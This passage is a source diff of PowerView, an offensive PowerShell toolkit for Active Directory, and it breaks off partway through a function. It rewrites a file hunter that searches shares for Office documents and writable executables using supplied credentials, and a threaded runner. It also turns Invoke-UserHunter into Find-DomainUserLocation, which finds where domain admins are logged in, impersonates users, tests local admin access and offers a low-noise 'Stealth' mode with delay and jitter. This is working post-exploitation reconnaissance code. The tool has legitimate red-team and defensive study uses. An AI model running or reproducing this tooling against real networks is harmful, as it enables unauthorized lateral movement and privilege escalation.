-        $OutFile,
-
-        [Switch]
-        $UsePSDrive
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    begin {
-
-        $Path += if(!$Path.EndsWith('\')) {"\"}
-
-        if ($Credential) {
-            $UsePSDrive = $True
+    BEGIN {
+        $SearcherArguments =  @{
+            'Recurse' = $True
+            'ErrorAction' = 'SilentlyContinue'
+            'Include' = $Include
         }
-
-        # append wildcards to the front and back of all search terms
-        $SearchTerms = $SearchTerms | ForEach-Object { if($_ -notmatch '^\*.*\*$') {"*$($_)*"} else{$_} }
-
-        # search just for office documents if specified
-        if ($OfficeDocs) {
-            $SearchTerms = @('*.doc', '*.docx', '*.xls', '*.xlsx', '*.ppt', '*.pptx')
+        if ($PSBoundParameters['OfficeDocs']) {
+            $SearcherArguments['Include'] = @('*.doc', '*.docx', '*.xls', '*.xlsx', '*.ppt', '*.pptx')
         }
-
-        # find .exe's accessed within the last 7 days
-        if($FreshEXEs) {
-            # get an access time limit of 7 days ago
+        elseif ($PSBoundParameters['FreshEXEs']) {
+            # find .exe's accessed within the last 7 days
             $LastAccessTime = (Get-Date).AddDays(-7).ToString('MM/dd/yyyy')
-            $SearchTerms = '*.exe'
-        }
-
-        if($UsePSDrive) {
-            # if we're PSDrives, create a temporary mount point
-
-            $Parts = $Path.split('\')
-            $FolderPath = $Parts[0..($Parts.length-2)] -join '\'
-            $FilePath = $Parts[-1]
-
-            $RandDrive = ("abcdefghijklmnopqrstuvwxyz".ToCharArray() | Get-Random -Count 7) -join ''
-            
-            Write-Verbose "Mounting path '$Path' using a temp PSDrive at $RandDrive"
-
-            try {
-                $Null = New-PSDrive -Name $RandDrive -PSProvider FileSystem -Root $FolderPath -ErrorAction Stop
-            }
-            catch {
-                Write-Verbose "Error mounting path '$Path' : $_"
-                return $Null
-            }
-
-            # so we can cd/dir the new drive
-            $Path = "${RandDrive}:\${FilePath}"
+            $SearcherArguments['Include'] = @('*.exe')
         }
-    }
+        $SearcherArguments['Force'] = -not $PSBoundParameters['ExcludeHidden']
 
-    process {
+        $MappedComputers = @{}
 
-        Write-Verbose "[*] Search path $Path"
-
-        function Invoke-CheckWrite {
+        function Test-Write {
             # short helper to check is the current user can write to a file
-            [CmdletBinding()]param([String]$Path)
+            [CmdletBinding()]Param([String]$Path)
             try {
-                $Filetest = [IO.FILE]::OpenWrite($Path)
+                $Filetest = [IO.File]::OpenWrite($Path)
                 $Filetest.Close()
                 $True
             }
             catch {
-                Write-Verbose -Message $Error[0]
                 $False
             }
         }
+    }
 
-        $SearchArgs =  @{
-            'Path' = $Path
-            'Recurse' = $True
-            'Force' = $(-not $ExcludeHidden)
-            'Include' = $SearchTerms
-            'ErrorAction' = 'SilentlyContinue'
-        }
+    PROCESS {
+        ForEach ($TargetPath in $Path) {
+            if (($TargetPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) {
+                $HostComputer = (New-Object System.Uri($TargetPath)).Host
+                if (-not $MappedComputers[$HostComputer]) {
+                    # map IPC$ to this computer if it's not already
+                    Add-RemoteConnection -ComputerName $HostComputer -Credential $Credential
+                    $MappedComputers[$HostComputer] = $True
+                }
+            }
 
-        Get-ChildItem @SearchArgs | ForEach-Object {
-            Write-Verbose $_
-            # check if we're excluding folders
-            if(!$ExcludeFolders -or !$_.PSIsContainer) {$_}
-        } | ForEach-Object {
-            if($LastAccessTime -or $LastWriteTime -or $CreationTime) {
-                if($LastAccessTime -and ($_.LastAccessTime -gt $LastAccessTime)) {$_}
-                elseif($LastWriteTime -and ($_.LastWriteTime -gt $LastWriteTime)) {$_}
-                elseif($CreationTime -and ($_.CreationTime -gt $CreationTime)) {$_}
+            $SearcherArguments['Path'] = $TargetPath
+            Get-ChildItem @SearcherArguments | ForEach-Object {
+                # check if we're excluding folders
+                $Continue = $True
+                if ($PSBoundParameters['ExcludeFolders'] -and ($_.PSIsContainer)) {
+                    Write-Verbose "Excluding: $($_.FullName)"
+                    $Continue = $False
+                }
+                if ($LastAccessTime -and ($_.LastAccessTime -lt $LastAccessTime)) {
+                    $Continue = $False
+                }
+                if ($PSBoundParameters['LastWriteTime'] -and ($_.LastWriteTime -lt $LastWriteTime)) {
+                    $Continue = $False
+                }
+                if ($PSBoundParameters['CreationTime'] -and ($_.CreationTime -lt $CreationTime)) {
+                    $Continue = $False
+                }
+                if ($PSBoundParameters['CheckWriteAccess'] -and (-not (Test-Write -Path $_.FullName))) {
+                    $Continue = $False
+                }
+                if ($Continue) {
+                    $FileParams = @{
+                        'Path' = $_.FullName
+                        'Owner' = $((Get-Acl $_.FullName).Owner)
+                        'LastAccessTime' = $_.LastAccessTime
+                        'LastWriteTime' = $_.LastWriteTime
+                        'CreationTime' = $_.CreationTime
+                        'Length' = $_.Length
+                    }
+                    $FoundFile = New-Object -TypeName PSObject -Property $FileParams
+                    $FoundFile.PSObject.TypeNames.Insert(0, 'PowerView.FoundFile')
+                    $FoundFile
+                }
             }
-            else {$_}
-        } | ForEach-Object {
-            # filter for write access (if applicable)
-            if((-not $CheckWriteAccess) -or (Invoke-CheckWrite -Path $_.FullName)) {$_}
-        } | Select-Object FullName,@{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}},LastAccessTime,LastWriteTime,CreationTime,Length | ForEach-Object {
-            # check if we're outputting to the pipeline or an output file
-            if($OutFile) {Export-PowerViewCSV -InputObject $_ -OutFile $OutFile}
-            else {$_}
         }
     }
 
-    end {
-        if($UsePSDrive -and $RandDrive) {
-            Write-Verbose "Removing temp PSDrive $RandDrive"
-            Get-PSDrive -Name $RandDrive -ErrorAction SilentlyContinue | Remove-PSDrive -Force
-        }
+    END {
+        # remove the IPC$ mappings
+        $MappedComputers.Keys | Remove-RemoteConnection
     }
 }
 
@@ -9248,62 +14326,58 @@ function Find-InterestingFile {
 #
 ########################################################
 
-function Invoke-ThreadedFunction {
+function New-ThreadedFunction {
     # Helper used by any threaded host enumeration functions
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
     [CmdletBinding()]
-    param(
-        [Parameter(Position=0,Mandatory=$True)]
+    Param(
+        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
         [String[]]
         $ComputerName,
 
-        [Parameter(Position=1,Mandatory=$True)]
+        [Parameter(Position = 1, Mandatory = $True)]
         [System.Management.Automation.ScriptBlock]
         $ScriptBlock,
 
-        [Parameter(Position=2)]
+        [Parameter(Position = 2)]
         [Hashtable]
         $ScriptParameters,
 
         [Int]
-        [ValidateRange(1,100)] 
+        [ValidateRange(1,  100)]
         $Threads = 20,
 
         [Switch]
         $NoImports
     )
 
-    begin {
-
-        if ($PSBoundParameters['Debug']) {
-            $DebugPreference = 'Continue'
-        }
-
-        Write-Verbose "[*] Total number of hosts: $($ComputerName.count)"
-
+    BEGIN {
         # Adapted from:
         #   http://powershell.org/wp/forums/topic/invpke-parallel-need-help-to-clone-the-current-runspace/
         $SessionState = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()
-        $SessionState.ApartmentState = [System.Threading.Thread]::CurrentThread.GetApartmentState()
+
+        # # $SessionState.ApartmentState = [System.Threading.Thread]::CurrentThread.GetApartmentState()
+        # force a single-threaded apartment state (for token-impersonation stuffz)
+        $SessionState.ApartmentState = [System.Threading.ApartmentState]::STA
 
         # import the current session state's variables and functions so the chained PowerView
         #   functionality can be used by the threaded blocks
-        if(!$NoImports) {
-
+        if (-not $NoImports) {
             # grab all the current variables for this runspace
             $MyVars = Get-Variable -Scope 2
 
             # these Variables are added by Runspace.Open() Method and produce Stop errors if you add them twice
-            $VorbiddenVars = @("?","args","ConsoleFileName","Error","ExecutionContext","false","HOME","Host","input","InputObject","MaximumAliasCount","MaximumDriveCount","MaximumErrorCount","MaximumFunctionCount","MaximumHistoryCount","MaximumVariableCount","MyInvocation","null","PID","PSBoundParameters","PSCommandPath","PSCulture","PSDefaultParameterValues","PSHOME","PSScriptRoot","PSUICulture","PSVersionTable","PWD","ShellId","SynchronizedHash","true")
+            $VorbiddenVars = @('?','args','ConsoleFileName','Error','ExecutionContext','false','HOME','Host','input','InputObject','MaximumAliasCount','MaximumDriveCount','MaximumErrorCount','MaximumFunctionCount','MaximumHistoryCount','MaximumVariableCount','MyInvocation','null','PID','PSBoundParameters','PSCommandPath','PSCulture','PSDefaultParameterValues','PSHOME','PSScriptRoot','PSUICulture','PSVersionTable','PWD','ShellId','SynchronizedHash','true')
 
-            # Add Variables from Parent Scope (current runspace) into the InitialSessionState
-            ForEach($Var in $MyVars) {
-                if($VorbiddenVars -NotContains $Var.Name) {
+            # add Variables from Parent Scope (current runspace) into the InitialSessionState
+            ForEach ($Var in $MyVars) {
+                if ($VorbiddenVars -NotContains $Var.Name) {
                 $SessionState.Variables.Add((New-Object -TypeName System.Management.Automation.Runspaces.SessionStateVariableEntry -ArgumentList $Var.name,$Var.Value,$Var.description,$Var.options,$Var.attributes))
                 }
             }
 
-            # Add Functions from current runspace to the InitialSessionState
-            ForEach($Function in (Get-ChildItem Function:)) {
+            # add Functions from current runspace to the InitialSessionState
+            ForEach ($Function in (Get-ChildItem Function:)) {
                 $SessionState.Commands.Add((New-Object -TypeName System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList $Function.Name, $Function.Definition))
             }
         }
@@ -9313,2300 +14387,2296 @@ function Invoke-ThreadedFunction {
         #   Thanks Carlos!
 
         # create a pool of maxThread runspaces
-        $Pool = [runspacefactory]::CreateRunspacePool(1, $Threads, $SessionState, $Host)
+        $Pool = [RunspaceFactory]::CreateRunspacePool(1, $Threads, $SessionState, $Host)
         $Pool.Open()
 
-        $method = $null
-        ForEach ($m in [PowerShell].GetMethods() | Where-Object { $_.Name -eq "BeginInvoke" }) {
-            $methodParameters = $m.GetParameters()
-            if (($methodParameters.Count -eq 2) -and $methodParameters[0].Name -eq "input" -and $methodParameters[1].Name -eq "output") {
-                $method = $m.MakeGenericMethod([Object], [Object])
+        # do some trickery to get the proper BeginInvoke() method that allows for an output queue
+        $Method = $Null
+        ForEach ($M in [PowerShell].GetMethods() | Where-Object { $_.Name -eq 'BeginInvoke' }) {
+            $MethodParameters = $M.GetParameters()
+            if (($MethodParameters.Count -eq 2) -and $MethodParameters[0].Name -eq 'input' -and $MethodParameters[1].Name -eq 'output') {
+                $Method = $M.MakeGenericMethod([Object], [Object])
                 break
             }
         }
 
         $Jobs = @()
-    }
-
-    process {
+        $ComputerName = $ComputerName | Where-Object {$_ -and $_.Trim()}
+        Write-Verbose "[New-ThreadedFunction] Total number of hosts: $($ComputerName.count)"
 
-        ForEach ($Computer in $ComputerName) {
-
-            # make sure we get a server name
-            if ($Computer -ne '') {
-                # Write-Verbose "[*] Enumerating server $Computer ($($Counter+1) of $($ComputerName.count))"
+        # partition all hosts from -ComputerName into $Threads number of groups
+        if ($Threads -ge $ComputerName.Length) {
+            $Threads = $ComputerName.Length
+        }
+        $ElementSplitSize = [Int]($ComputerName.Length/$Threads)
+        $ComputerNamePartitioned = @()
+        $Start = 0
+        $End = $ElementSplitSize
 
-                While ($($Pool.GetAvailableRunspaces()) -le 0) {
-                    Start-Sleep -MilliSeconds 500
-                }
+        for($i = 1; $i -le $Threads; $i++) {
+            $List = New-Object System.Collections.ArrayList
+            if ($i -eq $Threads) {
+                $End = $ComputerName.Length
+            }
+            $List.AddRange($ComputerName[$Start..($End-1)])
+            $Start += $ElementSplitSize
+            $End += $ElementSplitSize
+            $ComputerNamePartitioned += @(,@($List.ToArray()))
+        }
 
-                # create a "powershell pipeline runner"
-                $p = [powershell]::create()
+        Write-Verbose "[New-ThreadedFunction] Total number of threads/partitions: $Threads"
 
-                $p.runspacepool = $Pool
+        ForEach ($ComputerNamePartition in $ComputerNamePartitioned) {
+            # create a "powershell pipeline runner"
+            $PowerShell = [PowerShell]::Create()
+            $PowerShell.runspacepool = $Pool
 
-                # add the script block + arguments
-                $Null = $p.AddScript($ScriptBlock).AddParameter('ComputerName', $Computer)
-                if($ScriptParameters) {
-                    ForEach ($Param in $ScriptParameters.GetEnumerator()) {
-                        $Null = $p.AddParameter($Param.Name, $Param.Value)
-                    }
+            # add the script block + arguments with the given computer partition
+            $Null = $PowerShell.AddScript($ScriptBlock).AddParameter('ComputerName', $ComputerNamePartition)
+            if ($ScriptParameters) {
+                ForEach ($Param in $ScriptParameters.GetEnumerator()) {
+                    $Null = $PowerShell.AddParameter($Param.Name, $Param.Value)
                 }
+            }
 
-                $o = New-Object Management.Automation.PSDataCollection[Object]
+            # create the output queue
+            $Output = New-Object Management.Automation.PSDataCollection[Object]
 
-                $Jobs += @{
-                    PS = $p
-                    Output = $o
-                    Result = $method.Invoke($p, @($null, [Management.Automation.PSDataCollection[Object]]$o))
-                }
+            # kick off execution using the BeginInvok() method that allows queues
+            $Jobs += @{
+                PS = $PowerShell
+                Output = $Output
+                Result = $Method.Invoke($PowerShell, @($Null, [Management.Automation.PSDataCollection[Object]]$Output))
             }
         }
     }
 
-    end {
-        Write-Verbose "Waiting for threads to finish..."
+    END {
+        Write-Verbose "[New-ThreadedFunction] Threads executing"
 
+        # continuously loop through each job queue, consuming output as appropriate
         Do {
             ForEach ($Job in $Jobs) {
                 $Job.Output.ReadAll()
             }
-        } While (($Jobs | Where-Object { ! $_.Result.IsCompleted }).Count -gt 0)
+            Start-Sleep -Seconds 1
+        }
+        While (($Jobs | Where-Object { -not $_.Result.IsCompleted }).Count -gt 0)
 
-        ForEach ($Job in $Jobs) {
-            $Job.PS.Dispose()
+        $SleepSeconds = 100
+        Write-Verbose "[New-ThreadedFunction] Waiting $SleepSeconds seconds for final cleanup..."
+
+        # cleanup- make sure we didn't miss anything
+        for ($i=0; $i -lt $SleepSeconds; $i++) {
+            ForEach ($Job in $Jobs) {
+                $Job.Output.ReadAll()
+                $Job.PS.Dispose()
+            }
+            Start-Sleep -S 1
         }
 
         $Pool.Dispose()
-        Write-Verbose "All threads completed!"
+        Write-Verbose "[New-ThreadedFunction] all threads completed"
     }
 }
 
 
-function Invoke-UserHunter {
+function Find-DomainUserLocation {
 <#
-    .SYNOPSIS
-
-        Finds which machines users of a specified group are logged into.
-
-        Author: @harmj0y
-        License: BSD 3-Clause
-
-    .DESCRIPTION
-
-        This function finds the local domain name for a host using Get-NetDomain,
-        queries the domain for users of a specified group (default "domain admins")
-        with Get-NetGroupMember or reads in a target user list, queries the domain for all
-        active machines with Get-NetComputer or reads in a pre-populated host list,
-        randomly shuffles the target list, then for each server it gets a list of
-        active users with Get-NetSession/Get-NetLoggedon. The found user list is compared
-        against the target list, and a status message is displayed for any hits.
-        The flag -CheckAccess will check each positive host to see if the current
-        user has local admin access to the machine.
-
-    .PARAMETER ComputerName
-
-        Host array to enumerate, passable on the pipeline.
-
-    .PARAMETER ComputerFile
+.SYNOPSIS
 
-        File of hostnames/IPs to search.
+Finds domain machines where specific users are logged into.
 
-    .PARAMETER ComputerFilter
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainFileServer, Get-DomainDFSShare, Get-DomainController, Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetSession, Test-AdminAccess, Get-NetLoggedon, Resolve-IPAddress, New-ThreadedFunction  
 
-        Host filter name to query AD for, wildcards accepted.
+.DESCRIPTION
 
-    .PARAMETER ComputerADSpath
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and queries the domain for users of a specified group
+(default 'Domain Admins') with Get-DomainGroupMember. Then for each server the
+function enumerates any active user sessions with Get-NetSession/Get-NetLoggedon
+The found user list is compared against the target list, and any matches are
+displayed. If -ShowAll is specified, all results are displayed instead of
+the filtered set. If -Stealth is specified, then likely highly-trafficed servers
+are enumerated with Get-DomainFileServer/Get-DomainController, and session
+enumeration is executed only against those servers. If -Credential is passed,
+then Invoke-UserImpersonation is used to impersonate the specified user
+before enumeration, reverting after with Invoke-RevertToSelf.
 
-        The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
-        Useful for OU queries.
+.PARAMETER ComputerName
 
-    .PARAMETER Unconstrained
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
 
-        Switch. Only enumerate computers that have unconstrained delegation.
+.PARAMETER Domain
 
-    .PARAMETER GroupName
+Specifies the domain to query for computers AND users, defaults to the current domain.
 
-        Group name to query for target users.
+.PARAMETER ComputerDomain
 
-    .PARAMETER TargetServer
+Specifies the domain to query for computers, defaults to the current domain.
 
-        Hunt for users who are effective local admins on a target server.
+.PARAMETER ComputerLDAPFilter
 
-    .PARAMETER UserName
+Specifies an LDAP query string that is used to search for computer objects.
 
-        Specific username to search for.
+.PARAMETER ComputerSearchBase
 
-    .PARAMETER UserFilter
+Specifies the LDAP source to search through for computers,
+e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
 
-        A customized ldap filter string to use for user enumeration, e.g. "(description=*admin*)"
+.PARAMETER ComputerUnconstrained
 
-    .PARAMETER UserADSpath
+Switch. Search computer objects that have unconstrained delegation.
 
-        The LDAP source to search through for users, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
-        Useful for OU queries.
+.PARAMETER ComputerOperatingSystem
 
-    .PARAMETER UserFile
+Search computers with a specific operating system, wildcards accepted.
 
-        File of usernames to search for.
+.PARAMETER ComputerServicePack
 
-    .PARAMETER AdminCount
+Search computers with a specific service pack, wildcards accepted.
 
-        Switch. Hunt for users with adminCount=1.
+.PARAMETER ComputerSiteName
 
-    .PARAMETER AllowDelegation
+Search computers in the specific AD Site name, wildcards accepted.
 
-        Switch. Return user accounts that are not marked as 'sensitive and not allowed for delegation'
+.PARAMETER UserIdentity
 
-    .PARAMETER StopOnSuccess
+Specifies one or more user identities to search for.
 
-        Switch. Stop hunting after finding after finding a target user.
+.PARAMETER UserDomain
 
-    .PARAMETER NoPing
+Specifies the domain to query for users to search for, defaults to the current domain.
 
-        Don't ping each host to ensure it's up before enumerating.
+.PARAMETER UserLDAPFilter
 
-    .PARAMETER CheckAccess
+Specifies an LDAP query string that is used to search for target users.
 
-        Switch. Check if the current user has local admin access to found machines.
+.PARAMETER UserSearchBase
 
-    .PARAMETER Delay
+Specifies the LDAP source to search through for target users.
+e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
 
-        Delay between enumerating hosts, defaults to 0
+.PARAMETER UserGroupIdentity
 
-    .PARAMETER Jitter
+Specifies a group identity to query for target users, defaults to 'Domain Admins.
+If any other user specifications are set, then UserGroupIdentity is ignored.
 
-        Jitter for the host delay, defaults to +/- 0.3
+.PARAMETER UserAdminCount
 
-    .PARAMETER Domain
+Switch. Search for users users with '(adminCount=1)' (meaning are/were privileged).
 
-        Domain for query for machines, defaults to the current domain.
+.PARAMETER UserAllowDelegation
 
-    .PARAMETER DomainController
+Switch. Search for user accounts that are not marked as 'sensitive and not allowed for delegation'.
 
-        Domain controller to reflect LDAP queries through.
+.PARAMETER CheckAccess
 
-    .PARAMETER ShowAll
+Switch. Check if the current user has local admin access to computers where target users are found.
 
-        Switch. Return all user location results, i.e. Invoke-UserView functionality.
+.PARAMETER Server
 
-    .PARAMETER SearchForest
+Specifies an Active Directory server (domain controller) to bind to.
 
-        Switch. Search all domains in the forest for target users instead of just
-        a single domain.
+.PARAMETER SearchScope
 
-    .PARAMETER Stealth
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
 
-        Switch. Only enumerate sessions from connonly used target servers.
+.PARAMETER ResultPageSize
 
-    .PARAMETER StealthSource
+Specifies the PageSize to set for the LDAP searcher object.
 
-        The source of target servers to use, 'DFS' (distributed file servers),
-        'DC' (domain controllers), 'File' (file servers), or 'All'
+.PARAMETER ServerTimeLimit
 
-    .PARAMETER ForeignUsers
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-        Switch. Only return results that are not part of searched domain.
+.PARAMETER Tombstone
 
-    .PARAMETER Threads
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
 
-        The maximum concurrent threads to execute.
+.PARAMETER Credential
 
-    .PARAMETER Poll
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain and target systems.
 
-        Continuously poll for sessions for the given duration. Automatically
-        sets Threads to the number of computers being polled.
+.PARAMETER StopOnSuccess
 
-    .EXAMPLE
+Switch. Stop hunting after finding after finding a target user.
 
-        PS C:\> Invoke-UserHunter -CheckAccess
+.PARAMETER Delay
 
-        Finds machines on the local domain where domain admins are logged into
-        and checks if the current user has local administrator access.
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
 
-    .EXAMPLE
+.PARAMETER Jitter
 
-        PS C:\> Invoke-UserHunter -Domain 'testing'
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
 
-        Finds machines on the 'testing' domain where domain admins are logged into.
+.PARAMETER ShowAll
 
-    .EXAMPLE
+Switch. Return all user location results instead of filtering based on target
+specifications.
 
-        PS C:\> Invoke-UserHunter -Threads 20
+.PARAMETER Stealth
 
-        Multi-threaded user hunting, replaces Invoke-UserHunterThreaded.
+Switch. Only enumerate sessions from connonly used target servers.
 
-    .EXAMPLE
+.PARAMETER StealthSource
 
-        PS C:\> Invoke-UserHunter -UserFile users.txt -ComputerFile hosts.txt
+The source of target servers to use, 'DFS' (distributed file servers),
+'DC' (domain controllers), 'File' (file servers), or 'All' (the default).
 
-        Finds machines in hosts.txt where any members of users.txt are logged in
-        or have sessions.
+.PARAMETER Threads
 
-    .EXAMPLE
+The number of threads to use for user searching, defaults to 20.
 
-        PS C:\> Invoke-UserHunter -GroupName "Power Users" -Delay 60
+.EXAMPLE
 
-        Find machines on the domain where members of the "Power Users" groups are
-        logged into with a 60 second (+/- *.3) randomized delay between
-        touching each host.
+Find-DomainUserLocation
 
-    .EXAMPLE
+Searches for 'Domain Admins' by enumerating every computer in the domain.
 
-        PS C:\> Invoke-UserHunter -TargetServer FILESERVER
+.EXAMPLE
 
-        Query FILESERVER for useres who are effective local administrators using
-        Get-NetLocalGroup -Recurse, and hunt for that user set on the network.
+Find-DomainUserLocation -Stealth -ShowAll
 
-    .EXAMPLE
+Enumerates likely highly-trafficked servers, performs just session enumeration
+against each, and outputs all results.
 
-        PS C:\> Invoke-UserHunter -SearchForest
+.EXAMPLE
 
-        Find all machines in the current forest where domain admins are logged in.
+Find-DomainUserLocation -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local
 
-    .EXAMPLE
+Enumerates Windows 7 computers in dev.testlab.local and returns user results for privileged
+users in dev.testlab.local.
 
-        PS C:\> Invoke-UserHunter -Stealth
+.EXAMPLE
 
-        Executes old Invoke-StealthUserHunter functionality, enumerating commonly
-        used servers and checking just sessions for each.
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-DomainUserLocation -Domain testlab.local -Credential $Cred
 
-    .EXAMPLE
+Searches for domain admin locations in the testlab.local using the specified alternate credentials.
 
-        PS C:\> Invoke-UserHunter -Stealth -StealthSource DC -Poll 3600 -Delay 5 -ShowAll | ? { ! $_.UserName.EndsWith('$') }
+.OUTPUTS
 
-        Poll Domain Controllers in parallel for sessions for an hour, waiting five
-        seconds before querying each DC again and filtering out computer accounts.
-
-    .LINK
-        http://blog.harmj0y.net
+PowerView.UserLocation
 #>
 
-    [CmdletBinding()]
-    param(
-        [Parameter(Position=0,ValueFromPipeline=$True)]
-        [Alias('Hosts')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.UserLocation')]
+    [CmdletBinding(DefaultParameterSetName = 'UserGroupIdentity')]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('DNSHostName')]
         [String[]]
         $ComputerName,
 
-        [ValidateScript({Test-Path -Path $_ })]
-        [Alias('HostList')]
+        [ValidateNotNullOrEmpty()]
+        [String]
+        $Domain,
+
+        [ValidateNotNullOrEmpty()]
         [String]
-        $ComputerFile,
+        $ComputerDomain,
 
+        [ValidateNotNullOrEmpty()]
         [String]
-        $ComputerFilter,
+        $ComputerLDAPFilter,
 
+        [ValidateNotNullOrEmpty()]
         [String]
-        $ComputerADSpath,
+        $ComputerSearchBase,
 
+        [Alias('Unconstrained')]
         [Switch]
-        $Unconstrained,
+        $ComputerUnconstrained,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('OperatingSystem')]
         [String]
-        $GroupName = 'Domain Admins',
+        $ComputerOperatingSystem,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('ServicePack')]
         [String]
-        $TargetServer,
+        $ComputerServicePack,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('SiteName')]
         [String]
-        $UserName,
+        $ComputerSiteName,
 
+        [Parameter(ParameterSetName = 'UserIdentity')]
+        [ValidateNotNullOrEmpty()]
+        [String[]]
+        $UserIdentity,
+
+        [ValidateNotNullOrEmpty()]
         [String]
-        $UserFilter,
+        $UserDomain,
 
+        [ValidateNotNullOrEmpty()]
         [String]
-        $UserADSpath,
+        $UserLDAPFilter,
 
-        [ValidateScript({Test-Path -Path $_ })]
+        [ValidateNotNullOrEmpty()]
         [String]
-        $UserFile,
+        $UserSearchBase,
 
+        [Parameter(ParameterSetName = 'UserGroupIdentity')]
+        [ValidateNotNullOrEmpty()]
+        [Alias('GroupName', 'Group')]
+        [String[]]
+        $UserGroupIdentity = 'Domain Admins',
+
+        [Alias('AdminCount')]
         [Switch]
-        $AdminCount,
+        $UserAdminCount,
 
+        [Alias('AllowDelegation')]
         [Switch]
-        $AllowDelegation,
+        $UserAllowDelegation,
 
         [Switch]
         $CheckAccess,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
+        [String]
+        $Server,
+
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
+        [String]
+        $SearchScope = 'Subtree',
+
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ResultPageSize = 200,
+
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ServerTimeLimit,
+
         [Switch]
-        $StopOnSuccess,
+        $Tombstone,
+
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty,
 
         [Switch]
-        $NoPing,
+        $StopOnSuccess,
 
-        [UInt32]
+        [ValidateRange(1, 10000)]
+        [Int]
         $Delay = 0,
 
+        [ValidateRange(0.0, 1.0)]
         [Double]
         $Jitter = .3,
 
-        [String]
-        $Domain,
-
-        [String]
-        $DomainController,
-
+        [Parameter(ParameterSetName = 'ShowAll')]
         [Switch]
         $ShowAll,
 
         [Switch]
-        $SearchForest,
-
-        [Switch]
         $Stealth,
 
         [String]
-        [ValidateSet("DFS","DC","File","All")]
-        $StealthSource ="All",
-
-        [Switch]
-        $ForeignUsers,
+        [ValidateSet('DFS', 'DC', 'File', 'All')]
+        $StealthSource = 'All',
 
         [Int]
-        [ValidateRange(1,100)]
-        $Threads,
-
-        [UInt32]
-        $Poll = 0
+        [ValidateRange(1, 100)]
+        $Threads = 20
     )
 
-    begin {
-
-        if ($PSBoundParameters['Debug']) {
-            $DebugPreference = 'Continue'
-        }
-
-        Write-Verbose "[*] Running Invoke-UserHunter with delay of $Delay"
-
-        #####################################################
-        #
-        # First we build the host target set
-        #
-        #####################################################
-
-        if($ComputerFile) {
-            # if we're using a host list, read the targets in and add them to the target list
-            $ComputerName = Get-Content -Path $ComputerFile
+    BEGIN {
+
+        $ComputerSearcherArguments = @{
+            'Properties' = 'dnshostname'
+        }
+        if ($PSBoundParameters['Domain']) { $ComputerSearcherArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain }
+        if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter }
+        if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase }
+        if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained }
+        if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem }
+        if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack }
+        if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName }
+        if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential }
+
+        $UserSearcherArguments = @{
+            'Properties' = 'samaccountname'
+        }
+        if ($PSBoundParameters['UserIdentity']) { $UserSearcherArguments['Identity'] = $UserIdentity }
+        if ($PSBoundParameters['Domain']) { $UserSearcherArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['UserDomain']) { $UserSearcherArguments['Domain'] = $UserDomain }
